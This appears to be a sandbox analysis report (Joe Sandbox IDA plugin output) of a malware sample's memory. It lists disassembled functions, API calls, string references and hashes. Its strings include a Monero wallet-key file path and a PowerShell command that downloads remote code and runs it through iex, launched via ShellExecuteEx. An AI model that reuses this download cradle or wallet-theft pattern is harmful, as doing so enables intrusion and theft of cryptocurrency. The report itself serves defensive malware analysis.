Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

ShellExecuteEx.SHELL32(0000003C), ref: 00352D85

Strings

')", xrefs: 00352CB3
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00352D04
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00352CC4
<, xrefs: 00352D39

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: a503b41167eabcec084f419f77911b2b7f997a948487a2049dc469897329b8ef
Instruction ID: fdafc9847205e704d93a3106addc794f2038b6092816a6062b4930509daa4656
Opcode Fuzzy Hash: a503b41167eabcec084f419f77911b2b7f997a948487a2049dc469897329b8ef
Instruction Fuzzy Hash: D641B271C106089ADB1AEBA0C892FDDBB74BF14301F404119E916BA1A5EF746A4EEF91

Function 00349E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00349F41

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00349E67
@, xrefs: 00349EF1
v20, xrefs: 00349E21
v10, xrefs: 00349EA3

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: c26c15cada57492718e8b55e8ee6685246eee1895cca6376022c15b758cb2578
Instruction ID: 1c768fd37a90edb81bc1f085ad5e195f7fe788891696038b1941b971aaed626d
Opcode Fuzzy Hash: c26c15cada57492718e8b55e8ee6685246eee1895cca6376022c15b758cb2578
Instruction Fuzzy Hash: 1B615070A10648EFDB25EFA4CC96FEE77B9AF44300F008118F90A5F195EB706A49DB52

Function 00359260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0127E0D0,?,?,?,0035140C,?,0127E0D0,00000000), ref: 0035926C
lstrcpyn.KERNEL32(0058AB88,0127E0D0,0127E0D0,?,0035140C,?,0127E0D0), ref: 00359290
lstrlen.KERNEL32(?,?,0035140C,?,0127E0D0), ref: 003592A7
wsprintfA.USER32 ref: 003592C7

Strings

%s%s, xrefs: 003592B5

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: dca9c0b5466907e77fcf895fb58021ccea2c26737915cea6ed69f37a49dc8115
Instruction ID: f6db61dc3d8a2ece464cc997520428bd8c82e72d4e2ff1ef0666c3f41e4dbfac
Opcode Fuzzy Hash: dca9c0b5466907e77fcf895fb58021ccea2c26737915cea6ed69f37a49dc8115
Instruction Fuzzy Hash: 3D01E575500208FFDB04DFE8C989EAE7BB9EB48391F108549FD09AB204C631EA44EB91

Function 00356630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00356663

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

ShellExecuteEx.SHELL32(0000003C), ref: 00356726
ExitProcess.KERNEL32 ref: 00356755

Strings

<, xrefs: 003566D9

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 33cf4cd9a0d7230bb50784e71f3e0c8dead8954733c9da6839fe5248f4c282dc
Instruction ID: aa5b2399b5fcf14c51f92634918ddb681e8063c609904406c604767d67c52a22
Opcode Fuzzy Hash: 33cf4cd9a0d7230bb50784e71f3e0c8dead8954733c9da6839fe5248f4c282dc
Instruction Fuzzy Hash: CC314CB1801218ABDB15EB90DC82FDEBB78AF14301F405189FA097A1A1DF746B4DDF66

Function 003587C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E28,00000000,?), ref: 0035882F
RtlAllocateHeap.NTDLL(00000000), ref: 00358836
wsprintfA.USER32 ref: 00358850

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Strings

%dx%d, xrefs: 00358847

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: dc430518abbfaed286239373312ad90ebce21f070869f8b2265863853d0811ac
Instruction ID: 5ba2b5ea4530323496509f912a720b1dfecd6a4e722db1f58b0cc3ef1e0db129
Opcode Fuzzy Hash: dc430518abbfaed286239373312ad90ebce21f070869f8b2265863853d0811ac
Instruction Fuzzy Hash: 3C2130B1A40204AFEB04DFD4DD49FAEBBB8FB48701F104119FA05B7294C77999049FA1

Function 00358D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0035951E,00000000), ref: 00358D5B
RtlAllocateHeap.NTDLL(00000000), ref: 00358D62
wsprintfW.USER32 ref: 00358D78

Strings

%hs, xrefs: 00358D6F

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: e8751c2a95b169f4046c2bb5ca64522aa47ef8cb052cb9edaefe606f34025025
Instruction ID: 064bd42ce3ca9b20cf003d0ccd7fe215ef031efe5cf8a0bf27fe6bff5430d769
Opcode Fuzzy Hash: e8751c2a95b169f4046c2bb5ca64522aa47ef8cb052cb9edaefe606f34025025
Instruction Fuzzy Hash: A5E0ECB5A40208BBE714DB94DD0AE6977B8EB54702F004195FE09A7280DA719E14AFA6

Function 0034D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,0127A730,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,01279050,?,\Monero\wallet.keys,00360E17), ref: 00358B86

Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0034D481
lstrlen.KERNEL32(00000000), ref: 0034D698
lstrlen.KERNEL32(00000000), ref: 0034D6AC
DeleteFileA.KERNEL32(00000000), ref: 0034D72B

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 433d729c5d8f0445ffc140abfb080a6375a80ddd99f338be6a2f0da9b1d4253e
Instruction ID: a99f01e393818aab28a38fb7aec43687f8a62048e02c8a4a4dc01fc6b5530bad
Opcode Fuzzy Hash: 433d729c5d8f0445ffc140abfb080a6375a80ddd99f338be6a2f0da9b1d4253e
Instruction Fuzzy Hash: 5A9103729105189BDB06FBA4DC96DEE7738BF14301F504259F907BA0A1EF346A0DEB62

Function 00353560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
